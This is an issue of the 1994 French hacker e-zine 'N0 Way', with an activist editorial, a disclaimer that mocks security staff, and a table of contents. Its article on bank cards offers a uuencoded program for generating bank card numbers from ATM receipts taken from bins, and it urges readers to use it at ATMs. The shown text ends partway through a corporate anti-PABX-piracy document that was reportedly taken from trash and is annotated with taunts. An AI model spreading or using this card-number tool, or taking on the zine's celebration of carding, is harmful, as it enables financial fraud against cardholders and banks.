4728 lines
215 KiB
Plaintext
4728 lines
215 KiB
Plaintext
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.1
|
||
|
||
26 Septembre 1994
|
||
|
||
\-------------------/
|
||
> N0 WAY III <
|
||
/-------------------\
|
||
|
||
|
||
Ce matin, j'‚coute la radio: "Une famille alg‚rienne va ˆtre expuls‚e. Le
|
||
village o— ils habitent se mobilise contre cet avis d'expulsion..." et le
|
||
pr‚fet raconte des conneries sur la situation d‚plorable que devait avoir cette
|
||
famille en France sans travail stable et sans s‚curit‚ sociale.
|
||
|
||
Mais bien sur, dans son mental de politique verreux, il ne pensera jamais …
|
||
leur bonne int‚gration et aux problŠmes qu'ils affronteront en Alg‚rie.
|
||
Il ne pensera pas non plus au FIS qui s'attaquera a eux.
|
||
|
||
Je ferme la radio, d‚gout‚ ET LA, ca change: non, je ne me dis pas
|
||
"Qu'est ce que je peux y faire, je suis isol‚"
|
||
Je ne me morfond pas en disant: "On peut rien faire contre ces pourris".
|
||
|
||
Si, on peut faire quelque chose et N0 Way 3 est l… pour se battre … sa maniŠre
|
||
contre toutes ces pourritures. Maintenant, BASTA...
|
||
|
||
Les hackers&phone phreaks sont l… !
|
||
N0 Way est l… !
|
||
|
||
Alors dans cette issue sortie en quatrieme vitesse, j'espere que vous trouverez
|
||
votre bonheur. Ca bouge un peu partout en france, on entre dans l'hiver et
|
||
pourtant on sort de l'hibernation.
|
||
|
||
A Toulouse des assos se sont mont‚es pour faire bouger le monde de la
|
||
rave, a Paris c'est une complete effervescence. Chaque jour, je voie avec
|
||
plaisir un nouvel "apprenti sorcier" des r‚seaux me poser des question sur:
|
||
"Comment on hacke?"
|
||
"Comment on devient root sur Unix?"
|
||
"Comment on seize un trunk au Japon?"
|
||
Et les villes suivent: intiative techno & squatts … Lyon, bars & magasins
|
||
technos et cyberpunk … Montpellier, raves underground … Lille, d‚veloppeur de
|
||
virus informatiques … Rouen, boite HardCore … Tours etc...
|
||
|
||
Des initiatives jeunes se montent de plus en plus souvent dans notre
|
||
soci‚t‚ g‚rontocratique: Bars technos, Concerts grunge (… prendre au sens r‚el
|
||
du mot), Teknivals (ou teknivaux? :), Bar Cyberpunk, accŠs Internet pas cher,
|
||
home studio d'enfer...
|
||
|
||
Aux USA il y a d‚ja les Cypherpunks qui ont fait vraiment du boulot,
|
||
l'EFF s'est battu comme un diable contre le Clipper Chip mena‡ant la vie priv‚e
|
||
de chacun. Matt Blaze a montr‚ que le SkipJack (impl‚mentation de ce que l'on
|
||
appelle le Clipper Chip) ‚tait facilement "manoeuvrable".
|
||
|
||
R‚sultat: le gouvernement retire le Clipper Chip.
|
||
|
||
La mˆme bataille reste … mener en France. En Europe, des choses trŠs
|
||
graves se passent sans qu'on en entende tellement parler. En france, les
|
||
"pirates informatiques" sont montr‚s du doigt comme de petits vandales
|
||
informatiques, Satan‚s gosses, tous les mˆmes.
|
||
|
||
Alors, lisez N0 Way, et R‚AgIsSeZ !!!! Faites comme tous les cyberpunks
|
||
de France: bougez vous et devenez actif dans le combat contre cet establishment
|
||
qui nous ‚touffe.
|
||
|
||
Dans ce num‚ro nous vous proposons un superbe article de notre ami Arscene sur
|
||
la dissimulation de fichiers, un fichier r‚pandu mais d'une qualit‚
|
||
extraordinaire sur l'ins‚curit‚ d'Unix par Dan Farmer et Wietse Venema,
|
||
le manifeste g‚nial de "The Mentor" traduit pour la premiŠre fois en
|
||
Francais et plein d'autres superbes articles "mortels"...
|
||
Vous pourrez vous "fendre la gueule(tm)" avec un article en particulier.
|
||
|
||
Arrested Developpment, official distributor in Nederland (NL): +31 77 547 477
|
||
The One propage -- N0 Way -- en France et en Europe: +33 49 88 76 91 (BBS)
|
||
+33 48 70 10 29 (Minitel)
|
||
+33 48 58 46 17 (Minitel)
|
||
|
||
Vous pouvez me joindre:
|
||
~~~~~~~~~~~~~~~~~~~~~~
|
||
Sur RTC 0NE ! |\
|
||
Sur 3615 TALK | > Bal: NeurAlien
|
||
Sur The 0ne ! |/
|
||
|
||
Sur Internet !!!!
|
||
Email: an133729@anon.penet.fi (signez vos messages avec votre Email).
|
||
|
||
>>>>>>>>>>>>>>> TOUT ARTICLE ACCEPTE *<<<<<<<<<<<<<<<
|
||
|
||
"This is the network of the life" --Corona.
|
||
|
||
++NeurAlien.
|
||
|
||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||
|
||
Disclaimer:
|
||
Cette publication ‚lectronique peut contenir des informations,
|
||
donn‚es et articles interdits dans certains pays. Si les
|
||
informations de cette publication sont interdites dans un pays,
|
||
il est du devoir du lecteur de v‚rifier qu'il a bien le droit de
|
||
poss‚der et de lire (ahahahaha :-) cette publication. Les auteurs
|
||
et ‚diteurs ne sont en aucun cas responsables d'une mauvaise
|
||
utilisation des informations publi‚es. Pour les attaques en
|
||
diffamation et autres conneries bonne pour les censeurs, allez
|
||
voir qui vous croyez ˆtre l'‚diteur.... Pour la simple et bonne
|
||
raison que de responsable de la publication et d'‚diteur il n'y
|
||
en a pas!!! Les informations fournies dans cette publication sont
|
||
… titre informatifs uniquement. Nous ne vous garantissons rien et
|
||
si ca vous plait pas allez lire autre chose! Hahahahahahahahahaha...
|
||
Toutefois, la diffusion et la lecture de ce bulletin PRIVE est
|
||
restreinte … toutes les personnes dans l'underground informatique.
|
||
Ne font pas partie de l'underground informatique tel que je le concoit
|
||
les personnes suivantes: Membres d'‚quipes de s‚curit‚ publiques ou
|
||
priv‚s, personnes affili‚es … des agences gouvernementales,
|
||
informateurs quelconques, responsables s‚curit‚s et autres empaff‚s se
|
||
croyant sup‚rieur de par leur titre.
|
||
Lire ce bulletin en n'‚tant pas dans l'underground informatique
|
||
constitue donc une violation des lois de Copyright et de Propri‚t‚
|
||
Intellectuelle ainsi qu'un acte de malveillance envers les auteurs et
|
||
les r‚dacteurs car cela revient … lire des informations propri‚taires.
|
||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||
|
||
AprŠs ‡a, c'est pas la DST qui peut nous faire un procŠs pour
|
||
N0 WAY...
|
||
"Quoi? Vous avez lu de la documentation propri‚taire et secrŠte alors que vous
|
||
faites partie d'une agence de s‚curit‚????"
|
||
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.2
|
||
|
||
Table des matiŠres:
|
||
~~~~~~~~~~~~~~~~~~
|
||
# Titre Auteur Taille
|
||
3.1 : Introduction N0 Way Team 6 Ko
|
||
3.2 : Table des matiŠres N0 Way Team 2 Ko
|
||
3.3 : Trash & Carte Bleues Field 9 Ko
|
||
3.4 : Piratage des PABX -- Premier Acte. *Operator TDF* 17 Ko
|
||
3.5 : La conscience d'un Hacker The Mentor 4 Ko
|
||
3.6 : Data dissimulation techniques Arscene 20 Ko
|
||
3.7 : Playing hide 'n' seek in CyberSpace NeurAlien 21 Ko
|
||
3.8 : Cartes T‚l‚phoniques -- Premier Acte. D. O'Connell 9 Ko
|
||
3.9 : L'Underground Francais sous developpe? * NeurAlien 16 Ko
|
||
3.10: L'art du Social Engineering NeurAlien 7 Ko
|
||
3.11: "Breaking Into Your Site" D. Farmer & W. Venema 53 Ko
|
||
3.12: Plaisanter sous Unix NeurAlien 10 Ko
|
||
3.13: Du cot‚ d'Internet NeurAlien 19 Ko
|
||
3.14: L'explosif? Tient tient... Inlandsis 7 Ko
|
||
3.15: Prime & The PrimeOS environment * NeurAlien 6 Ko
|
||
3.16: Rave Revolt NeurAlien 4 Ko
|
||
3.17: Multics * NeurAlien 7 Ko
|
||
3.18: Tel - Trixx NeurAlien 6 Ko
|
||
|
||
Nota: une ‚toile (*) aprŠs le nom de l'article veut dire que cet article a ‚t‚
|
||
fait pour CORE DUMP et ressort pour N0 WAY.
|
||
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.3
|
||
|
||
|
||
>--------------<
|
||
> TrAsH &&& C.B. <
|
||
>--------------<
|
||
|
||
Le fichier suivant est … uudecoder. Si vous savez pas faire c'est vraiment que
|
||
vous avez autre chose … apprendre que la contrefacon de num‚ro de cartes
|
||
bancaires.
|
||
|
||
Ce petit utilitaire a ‚t‚ ‚crit pour ST (GFA basic) par FIELD.
|
||
Il permet de g‚n‚rer des num‚ros de carte bleue … partir des bouts de papier
|
||
trouv‚s dans les poubelles des distributeurs automatiques.
|
||
|
||
Vous pouvez contacter Field sur The 0ne. +33 1 48 70 10 29
|
||
|
||
alors, revetez votre cyber-combinaison, prenez votre portable et votre radio-
|
||
modem 28800 bauds puis rendez vous … l'ATM le plus proche pour une autre
|
||
session de d‚lire avec N0 Way...
|
||
|
||
++NeurAlien.
|
||
|
||
----------------------------------CUT HERE-----------------------------------
|
||
section 1 of uuencode 3.07 of file cb_nums.zip by R.E.M.
|
||
|
||
begin 644 cb_nums.zip
|
||
M4$L#!!0``@`(`&1F)QWUW^]R`04``(X+```+````0T)?3E5-4RY'1D&M5LUO;
|
||
M&T44GQW;&W^LG<3Y:H*3C*VH::,VV$DV:1!2V8UWBHMC1W9:A%0)F62K&KEV'
|
||
M\4=4]51%XMX#!X[\$1QZ[*DJ$D*<N.',2@@AU`-';N7-?MG+6B8'DOSFO?ST(
|
||
MWF_>FYW9612X0Y6;JE(M'&PCZZ>/D'`5L'D)M/V(O$0H^CO@3X1BKQ&2DH#Y(
|
||
M2T#U(_&$0RS=.]0JY<!1N2I6CRL%K20H@BH<"'E!PTH.*UM8V<;*#E9DK.QB"
|
||
M90\KM["R'U!R64`.L`78!NP`9,!N\*A2SH?XD#/'[9`YA^G+YKAGCONB&9.S5
|
||
MS+9EY``$!T$I&P0'YL]B-8?5+:QN8W4'JS)6=[&ZA]5;6-T/J%"%"E6H4(4*0
|
||
M5:A0A0H::FXW0"L:LKN#1@1EJ!7%[.82K8A:Z:`\T$&A0NGHWO'$?:U2H`4M7
|
||
M6M(^_=Q>/T@P"PYII7R!1K1J52EL9K/94%Y3(8,6#CXN:!4A)VRA,/H;A2DRE
|
||
M[81IKYA6#+ZE%.V&7O5OY%O-IOZ,-'1RTCK5"?PU:N2+6O.KGDZND1UR\JC^S
|
||
M\&%;[Y#KY(.T@2G:@"PRR&KV'I^W6SQO?Q`+D2)%5W&QGZKH)X_T-H#4SO03`
|
||
MR.@,PC(\:A,?';Z!_;J1_N]@BD1<A#$QR$'4["Y"#Y&(4G:/O&<"OX$[9/7G'
|
||
MX_[T@P.E<JQ5;;-9RA&*UH)K?:&<=G3\,:`11;=`XR?Z!DFXJ/+("<@L05]W(
|
||
ME&Y7;W;KK299=S/6B?ZTWNG6ZEUR>OYEC=P@]08YJQ&]V]9)6V^V'I\3?2AA,
|
||
M:WV3HE3H>3]R4FMW]<YF,]<8^%MVC:UQ-7:AZS7W";>'UH"O2%C((NDE-6W<_
|
||
MM@M@DV`W?D7?F2^*(*8ZNB+L(.&V@=,_\+F$M#E"KYP/N#SV\$&7#WCXD,L'#
|
||
M75Z"&<.R`:[E1V0CX/A1V0@Z?DPV0MSG.N';ACBJGHC+>^N)NKRWGIC+!SV\[
|
||
MY/(A#Q]W>='#)UQ^PL-/NGS8PT^Y?,2S#@G9"#O]3LI&Q/&G9"/J^-.R$7/\B
|
||
MI&Q(CC\C&W''GY6-A.//R<:DX\_+QA3W^9X0^)EQ]P3_C^\!!'M@%NPB"T]<0
|
||
M/+=V`1PD-,_/S-T\6YR\</;&72=R,73QPMDOV-YU4UR+(9$MBBQ"K<@E%AVA*
|
||
M^2U;\FDNL:5QFDLBB]F:*2:-T'S+4C[-%$N-TTR)+&YK+K.$7_.3C]BR3W.92
|
||
M+8_37!;9I*VYPJ9&:'[#5GR:*VQEG.:*R*9MS566'*'Y!UOU::ZRU7&:JR*;@
|
||
ML34)F_5K%C]DQ*=)&!FG240V9VNFV?P(S1<L[=-,L_0XS;3(%FS-#$-A-QLB@
|
||
M.;?&4&R82YCS_,;6)):Q]CRFQ]:;^_`7VD1/<?$S?OI6S#,8)9D]%@9$`%%`]
|
||
M+-,7."<!XH`$8-+FI@#3@"1@QN9F`7.`><!"IC]'1OUD^$D<NC$>#.XK3/[7:
|
||
M"IR.=7L5!V<=TR?F>BVP!=%^+H%W])WU7$H_LH69P3.8<6\&GA%G\1$9KUE\D
|
||
M*./4O5-XAL0D3X;Y3$JOF#3#-IP[>Q=NS?GB>JM]6F_6NGJO3;XFW7:K=W;.V
|
||
MFT*9_K3]+=&!*[-1/X4K\%^KR#N-FO>\U>E@]+[IIBFU[)7A.%KY:KMYOB
|
||
M]1KZLYMGK5Z'])KPD=&S+F;GH^-:^?W2=9(VDM3JN:P:R??@(T$P38O:MZQAO
|
||
M[:YRA2:1*/PU5`N?/8B^_P=02P,$%`````@`X'OU'!=FX(YY`@``\P8```L`(
|
||
M``!214%$7TU%+D=30U/`#FX=(0CV\W)A5Z>P62%:V]@X5E?#4%/7Q-+"0M?<2
|
||
MS-)0(2"Q*+-8WZTH,2\Y%:@$AX&;%4Z>I0[8K;`98N`NA5MP?]VY<^?^_?M`M
|
||
M4@&/$!9%"@K[@>;`#82!V_?!)$CI_=MP(3U4(9`B/51%$``U$`F`I/44[MR_?
|
||
M#01WP#P(@2($Q+^01'BY[@-MN`V"0./OW84:=/OVIMNW[X*X0/P+50BB"$@BA
|
||
M%$$-!ID!=--M!8B!</M!FL"*(5+H0O<A0`%-$1AC&/>+H'%P0,@XN&^!&*04$
|
||
MZ!60T`]4(84[4/?=AXN09!QV&X`8IW'W;X-C'=EGMS$]"Q4"I30P0"BZ#XG,U
|
||
M^U@BXP=A`Y%"#ZX(;@*2@7=0DLMM1$KXB6K@O=N0P$-6=.<V#&-)PC^!?@(IW
|
||
MO8^1@A"._JF`4(21K<`Y#V2KPIW;"$-O*R"Y`*SH)[(B&$#*IP?@@I`,#4ZC:
|
||
MD*`!!SB4ANE'4P0!-Q$&GJ!2T;0'8N`!U/)OLX);9DJ^7VJ)E9&5D8F!OI&AF
|
||
MD:&>D:%"<$%B439(N-C`($\A.3\W,R]=83-:X7D3+1I`X,`1$@#(@`!G?8\`%
|
||
M$PM]QQ)@6:WOD9B<K9ZG4)!1E)J8#;13WR4_N5@_(!-(!.>7YJ7\"DY-+LDOL
|
||
M4C#(2]5W+2S-S,NOT'?U-M!W*RTJR2Q+U8>X*"C86=\OM5PA.+&DM"A/(=PCF
|
||
M\)=S?EY)47Z.0DAJ8JZ^8U%V1F*N@AM0/""C"&@E4#^0\,M7"$^L5$C)+"Y1\
|
||
M*,XL2?V%\)^BP@<_@P\*08XAG@80IHNCIT^D@H^GKV<(1"`@R#/,T3D2PG%T?
|
||
M"@WV#'-5<'/T=E50Y.4"`%!+`P04````"`"2H@(=BOTJL54"``#Y!0``#```C
|
||
M`%)%041?1$E3+E546%,`@0T;-^$"&S<`Y>^`52GHX5?(RP4S[/9],+BM`)9!J
|
||
M\("&Z8'5_$15B`K`"I$,4[A]7V'#!IAA<![894"3_H$<AJ00%6`:IK`!V3`%7
|
||
MF!JHRQ`*,<W"-.P^BF'W$88IH'@3[C&(*5`NNF$P*R"&(2P$^>\^./B18PI54
|
||
M/7H$*&P$`5B(0GC(+D.+S=MP%;@-0P5($0"*`07B#<.2=K!%`$(*B4(S[#Y6@
|
||
M`/?F?4@,(`Q#J,!B&.Z$#8U(HG.`PBV%(Q0"A?U0LS8#<>@OA?>_%%Q^*3SY.
|
||
MI1#T2\$=3!K\0H@#00A85N,7B&$`%E\+Y@:#9#?#'':`<H?=A)D%LC3CB4+>E
|
||
MDW*%D"]/\EP4\N<KK/4[].3+^V4AF09YCCD*X8E![Z(4D@U*@[ZL?1>TUB]='
|
||
MP>"+^[+W:X.7A:PUR-,#&C0W/U0]1<%GK7>JPB$#A:0G"LO>*X2&P+4HK%`P6
|
||
M*`(I*E)XF._XQ44AU[%2X>$[D)*4M<4A7]8FA1[RS'^O4+RVY(G""K##(.H5$
|
||
MLD*+0Q3*'?-"%(H-<I\HY+LI`(U4F+\V[PE0M.A)%=!DGW<A"I4&I0H:RWQRC
|
||
M%`SRX(H\`A7R@Q2L8-X,?>_R),@]R!](*X0\T0@Q>+_6.5C!,??)E[7)CGD*[
|
||
MX4#E5@I!3QX^\5'P>;(V.#3HB8*VH;Z%@:&N8["WKLG:$$7\)CTI#<H/>`<W1
|
||
M*<3CB8+!^R<*#Q\&`[5H&QOK&YI86N@&/0DF9)!C\=IE?B!IB$$N&D#O_'X2F
|
||
MY./OZ`(TR,+42-_(W%`WV"#<PS'$GI<+`%!+`P04````"`#H92<=:TQK`&8'R
|
||
M```J$0``"P```$-"7TY535,N1$]#K5C?;]M&$GXWX/]AWF3'%FDGOL0QF@"VF
|
||
M$C<IDM9-?%?@C@=A1:WLO?"'LB3=7$S=@P"_]*^^;V:X$M4F=0N43B*2N_/-`
|
||
MS#??S%KQ=G9"YZ]?OGFQO45\S7UYY4V>6YI;G]NZ-D5-4TO>UKYL;JS'0T5%Y
|
||
MDR]]6?%":GQMJ;.>F"(USENZH[GQKM;=3RF]=K.9QVUE27`8M6H\97A'P;IV.
|
||
MZ0=;*ZKUM7$%[EU5>S=I:MMX69FX+,.F:'MK>VMD4T>V0H!ED5)F\)DVN2UJV
|
||
M4[NRH&G32^=CXU;>K?B<&N!G`^,1'5X)"X?1/U]?1'3F;`$+CJ,'86A9+\&$'
|
||
M&<(Z<]62L.O;\]/AF:E<2O]ASHK*BB$G5LV7J3/86-M*B+@829ZP+@:F\25(-
|
||
M,$W:%.QCDOV2,V\9QVBF#;,(^(O3]Z/3-\CV[]AE&YH.7#$K?2X95BL.OT;3>
|
||
MR?86X!%_,:6BS"<`Q>*+TS/:Z9L@C+ID3`Y];;V+PMR4386<(04"DI9(7[IBR
|
||
MBOU<23!?E4JRU35S8UP-:[^LG5\2E])UO'3B83?O7I]1V5!:YO/:1C3JK[$HK
|
||
M>)W+RQM*T`T_\ZR!LFJN;6WSN>3:TQ=B<YE2G)8>;^8E,K]#Z)8563O+EFLOM
|
||
MHS-J:B>UG)?"95<@UCM2B'!K/\%19D\(*6R$/]+HCIX^.:*#PX>/Z.AOCY_0.
|
||
M\=/#`\C#?H$KZPWG=$(/'_%6[)2-G&8O6A&S:3XA+W.C[><+9U'759IP#BXXL
|
||
M2>F^T':0R7<#X\!Z;OS'9@GY0I%3QE`Q=TW%]9>2UE;@*XZ512WMAXJ`PV+PI
|
||
M7PA>Y:DI`YW[`I+KBBS_3&T.<=G/7"1N/0IS(E58@00-0)]P5P&Z:F8S)U-EP
|
||
M)L."!3RWM>,V014F-N,WO88=LO6-Q"H]:S4%J1@@T9VFJN`2XJB<=H#[C$RM7
|
||
MCHEW%K9,PAWE9=%K:,2B4VYSPK%8I&MU3-C^N$/-;]#2S%F*_E7<;&/(L9!K,
|
||
M,=8Q@5L1,%>JT2Z>^U\J.CX(P!&]SI1-H08JF6*=K4OM9EF#O\*F-0+DKG\[B
|
||
M^N$MEPJ(:%[/1#6I4J*4,6,BZ$D9*L@MD#N6CH0%<MZB<^MFOIR95$;F$@(1A
|
||
M-@(7:TH#"2'],$%7;`'N37]<]N5!==D`=V`FI9]N=A'$R^($'%=<IKFEH[76:
|
||
M=Z2_NNZ$>U>9BLZ^O\!P`FL5]U167H7)-662_!<],+RVV5!*P\WF6>(BIDD8V
|
||
M^5-1HZ\8B`>93>45"H_PF6D]L124MS:B3--4F`^"`B5!UEZZ%,?+U4JXJ8Q>S
|
||
MH=U5?%[HK*RDI=@W7H'-JN%5B!H?&,N3I12<>>YKBM,IK*@03F6^`:O)2R=%V
|
||
MV9Q36C2QWD%9W<PIZ*/'AT<BI5WIE._6_AD-*+TSK)LZH<#=&<O#"HE+AW9#T
|
||
M(<,TT,YFXDR^S%SINP/K;O-(92]=7*LS$*:8!,.,!?4/AIRS%#]W#.>:LEDUG
|
||
MPKO+T?"'[U]VOT,0Y:Z`?49'Q\,G!\/#@^'#I\138F*R\)O.]M8EY&BE($SC>
|
||
MG1SL4RA_[I?I$IKEDA52/EGZV`SN,,RXS3A4GN8I$IHQKH[(U%1=]5BI.#HP;
|
||
M\SP/%9[IE9ED[(E/X>TMG/$#/70Z"JW,ROZY+L6@KUW#9T-Z@1+-7"8,5G9*5
|
||
M];5O>($-]XCB7YE$]+M7O-X4L>.XE1</?N.Y'/;0!OA1\W8\'D?1N$/:`T0<?
|
||
MXQ5>C&4EXEO:ER>YY5W\3SMH!^L`<"6=[V`LS@90;;<<]T*.@UD27H['+2ZV3
|
||
MVEV%F224C,=Q,):]+2),QNL(^1.>$UKP,S8LU#P.(`OQU"8!L7\M:!RWH5RWX
|
||
M8AL+7,Q_NOLUSP(2WW:/"K5(-.68@XHYV`YPC\!&JYRTBH?`^95P+RA)*S=)^
|
||
M>%3@!=]%RO.NIAP%L@`GCD)&XUW>V:ZH3/1OLGJ\[2J4:)WE/@XIQQTC0IQ$K
|
||
MJ-ERT'M*9;R)R!:W?0J3/IYDW++A0IG9462%C=>W29>EL-HQR>%A^T+A]L+F?
|
||
M7?T(BDG&.VNTE:@6BIUH#(N.WUB(7P7'*.,.[#9DC?L!*$Q6R8B9PB?CF%9NF
|
||
M-0:`19UWYFM'_F@B(M6D72E5-L:B`7E\UE69QKH6`HLT-+9J^2G1#A[2\`'^&
|
||
MALIIZ61CI!"J@R1P\6`]=D)OM2$I#;D-XN=.ZV_\53WC(&`=$FP\Z&^):#U'N
|
||
M,`6HOPZCL[/WNIS$7YB$>QM/@TW8:.W@-Q>FV[._]MK>>H]?RDI/!X6-7WXH1
|
||
MX_/SR_@E3I6B_!2?-_C*<6/C4__AVN3TTZL?:?B_(7WS7#Y&.,=\F=&EQ=JY6
|
||
MMT5Z3:]^O"_"Y_3J`H<;_53Z;$KXZFGIFWLBY`.#Z")^%9_&HWW8'QWOT[G)W
|
||
M<)#NT_O+?3K-W979Y^^G/QMO/^_3M2OJ:I]&UX8_^-S*2WR_(-(SYGY:GM,[&
|
||
M5USA.^?/=')/?*L(_X6Z/L+/OR'8'3I$TQ[AU^HA'>/G"3X?X^E03K]#^K:DH
|
||
M@_B-/%S@?QHJJ/`<WW)QH/_1"/_4M;WU?U!+`0(7!10``@`(`&1F)QWUW^]R3
|
||
M`04``(X+```+``````````$```````````!#0E].54U3+D=&05!+`0(:!10`*
|
||
M```(`.![]1P79N".>0(``/,&```+````````````(````"H%``!214%$7TU%=
|
||
M+D=30U!+`0(:!10````(`)*B`AV*_2JQ50(``/D%```,````````````(```'
|
||
M`,P'``!214%$7T1)4RY55%A02P$"&@44````"`#H92<=:TQK`&8'```J$0``\
|
||
M"P```````````"````!+"@``0T)?3E5-4RY$3T-02P4&``````0`!`#E````D
|
||
MVA$``+,!1&EZ('=A<F4@=V%S(&QE96-H960@9G)O;2XN+@T*R<W-("#;V]O;)
|
||
MLB#;V]O;LB#;V]O;LB#-S;O)S<W-(%LK,S-=+2@Q*2TT.3@X+3<V.3$@<V]OT
|
||
M;B!A;B!54U(@5C,T(&YO9&4N+BX@S<W-NPT*NB`@("#;LB#;LB#;LB#;LB#;N
|
||
MLB`@("`@(+JZ(%-E8W1O<B!/;F4O17%U:6YO>"]%2T\O1G5R=&EV92]&1E0O<
|
||
M07)K:&%M+TI&1B!72%$@N@T*NE1H92#;LB#;LB#;LB#;LB#;V]NR($)"4[JZ/
|
||
M("%&=6-K(2]#;VYT<F]L(%1E86T@1DA1("T@4&AR86-K+TYO(%=A>2!D:7-T9
|
||
M('-I=&4@N@T*NB`@("#;LB#;LB#;LB#;LB#;LB`@("`@(+JZ(%!#+T%T87)II
|
||
M+TA0-#@O4$A!0R]-:7-C96QL86YY("T@2G5S="!K97=L('=A<F5Z("$@N@T*=
|
||
MR,W-("#;V]O;LB#;LB#;LB#;V]O;LB#-S;S(S<W-($ME=VP@<F%T:6]S+"!NZ
|
||
D;VYE(&9O<B!L;VYG+61I<W1A;F-E(&-A;&QE<G,@S<W-O`T*6
|
||
``
|
||
end
|
||
sum -r/size 57111/7388 section (from "begin" to "end")
|
||
sum -r/size 39491/5256 entire input file
|
||
----------------------------------CUT HERE-----------------------------------
|
||
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.4
|
||
|
||
|
||
,{$' Piratage '$},
|
||
. __=/%(~{; ;}~)%\=__ .
|
||
~\|[:&^ des ^&:]|/~
|
||
`\![! !]!/'
|
||
`+# P.A.B.X #+'
|
||
|
||
PART I
|
||
|
||
Avant propos: Apparemment, en France aussi les grandes entreprise se
|
||
mettent … r‚agir contre le piratage des PABX. Ce document provient d'une
|
||
grosse entreprise francaise et concerne le piratage des PABX.
|
||
Interressant de voir comment le monde des hackers est aid‚ par les entreprises.
|
||
J'ai trouv‚ ce document dans les poubelles du secretariat de l'entreprise qui
|
||
produit ce document! arf'''
|
||
ps: ce qui est entre crochet vient de moi. ++NeurAlien.
|
||
|
||
--------
|
||
|
||
Le piratage classique des systemes telephoniques PABX
|
||
|
||
Societe Operator TDF
|
||
|
||
[ya pas de copyright, on est inattaquable hehehe]
|
||
|
||
Le Piratage telephonique.
|
||
|
||
Sommaire:
|
||
1ø) Approche chronologique en terme de piratage de ligne:
|
||
A) Premier controle de facture
|
||
B) Controle de la facture suivante [Kewl, ca nous laisse 4 mois tranquile]
|
||
C) Prise de conscience [ptin ils sont lents ;) ]
|
||
2ø) Approche chronologique en terme de perte de contrat
|
||
A) Baisse du chiffre d'affaires
|
||
B) Augmentation du CA du concurrent
|
||
C) Prise de conscience [bin oui, t't'es fait niquer! ;) ]
|
||
3ø) Les types de piratage:
|
||
A) Ecoute des communications
|
||
B) Detournement d'une ligne
|
||
C) Recherche des lignes modem
|
||
D) Sabotage des systŠmes [Beurk!!!!]
|
||
4ø) Les m‚thodes de piratage:
|
||
A) Piratage d'une ligne.
|
||
B) Piratage d'un base TSF. [Telephone Sans Fil je crois]
|
||
C) Piratage des fonctionnalit‚s d'un PABX.
|
||
D) Piratage des auxiliaires d'un PABX [Messagerie vocale par ex.]
|
||
5ø) Les moyens … mettre en oeuvre:
|
||
A) L'acces des locaux
|
||
B) Protection des informations
|
||
C) Destruction des informations p‚rim‚es
|
||
D) Sauvegarde de l'information
|
||
6ø) Les moyens de controle:
|
||
A) la taxation t‚l‚phonique
|
||
B) L'observation de trafic.
|
||
[==Deuxieme partie dans le prochain num‚ro==]
|
||
C) Le controle qualit‚ des lignes.
|
||
7ø) La protection des lignes des systŠmes [a partir d'ici, c'est sur le mec ]
|
||
A) Piratage du mot de passe [ qui a ‚crit ca avait fum‚ ou ]
|
||
B) Mot ou clef al‚atoire [ gobb‚ un acide ]
|
||
C) Cryptage des lignes
|
||
D) Cryptage du disque dur
|
||
E) r‚orientation des appels
|
||
8ø) Les supports de transmission.
|
||
A) Les supports radio.
|
||
B) Les supports physiques.
|
||
C) Les cabines de brassage.
|
||
D) la gestion des supports.
|
||
9ø) Les couts du piratage:
|
||
A) cout des fonctionalit‚s
|
||
B) cout de la telemaintenance
|
||
C) Piratage volontaire du PABX
|
||
D) Piratage de l'informatique
|
||
10ø) Les m‚thodes:
|
||
A) Introduction
|
||
B) La m‚thode MARION
|
||
C) La m‚thode MELISA
|
||
11ø) La loi godfrain: [ Rahhhh.. chiotte galactique !]
|
||
A) Intro
|
||
B) destruction
|
||
C) les niveaux de cette loi.
|
||
|
||
Document
|
||
|
||
1ø) A)
|
||
taux normal: augmentation de la facture : 4% tous les deux mois.
|
||
Element moteur: elevation anormale de la facturation
|
||
controle par rapport aux factures precedentes.
|
||
detection: taux d'augmentation constant, passant brutalement d'une
|
||
facture sur l'autre de 4% … 9%
|
||
constat: augm.o brutale de 5% en plus des 4% habituels.
|
||
pourquoi?
|
||
- pas de changement de contrat, pas de creation de nouveau service.
|
||
Action: demande de controle et facturation detaillee pour les mois a
|
||
venir.
|
||
B) facture suivante:
|
||
meme chose : augmentation 9%
|
||
analyse: verif de la fact. detaillee.
|
||
constat: - appels minitel
|
||
- appels vers l'‚tranger
|
||
- appels en dehors des heures ouvrables
|
||
question: interne ou externe?
|
||
reponse: les deux
|
||
conclusion: le systŠme est pirat‚.
|
||
|
||
Cette conclusion doit rester interne et confidentielle.
|
||
|
||
action: eliminer les causes interne en premier
|
||
action sys: controle d'acces
|
||
>>> EVITER DE FAIRE CONTROLER SON SYSTEME PAR SON INSTALLATEUR OU
|
||
CONSTRUCTEUR DANS UN PREMIER TEMPS.
|
||
C) prise de conscience
|
||
a) demande d'info:
|
||
- autres entreprise
|
||
- presse sp‚cialis‚e
|
||
b) declenchement d'une mission interne preliminaire:
|
||
1) constitution d'un groupe de travail.
|
||
2) definir les objectifs
|
||
3) definir un planning
|
||
4) rechercher un cabinet independant disposant d'experts en la
|
||
matiere.
|
||
5) presentation du probleme.
|
||
6) Etablir un contrat definissant la mission du cabinet.
|
||
7) signature du contrat.
|
||
c) declenchement d'un audit.
|
||
1) def.o de la mission
|
||
2) planif.o " "
|
||
3) analyse physique de l'existant
|
||
4) analyse des risques financiers
|
||
5) analyse du systŠme
|
||
6) definition des controles … mettre en oeuvre
|
||
7) definition des tests … r‚aliser
|
||
8) mise en oeuvre de 6 et 7 [ OUARF... TROP UTILE LA 8) !!! ;) ]
|
||
9) [yen a pas!!!! bin alors ?? ;) ]
|
||
10) Consignation des r‚sultats
|
||
11) les recommandations … mettre en oeuvre
|
||
12) SynthŠse ‚conomique et technique sur les risques et les moyens
|
||
compl‚mentaires de protection … mettre en oeuvre.
|
||
d) action:
|
||
mise en place des solution d'urgence pr‚conis‚es.
|
||
|
||
2ø) [ c'est chiant je passe]
|
||
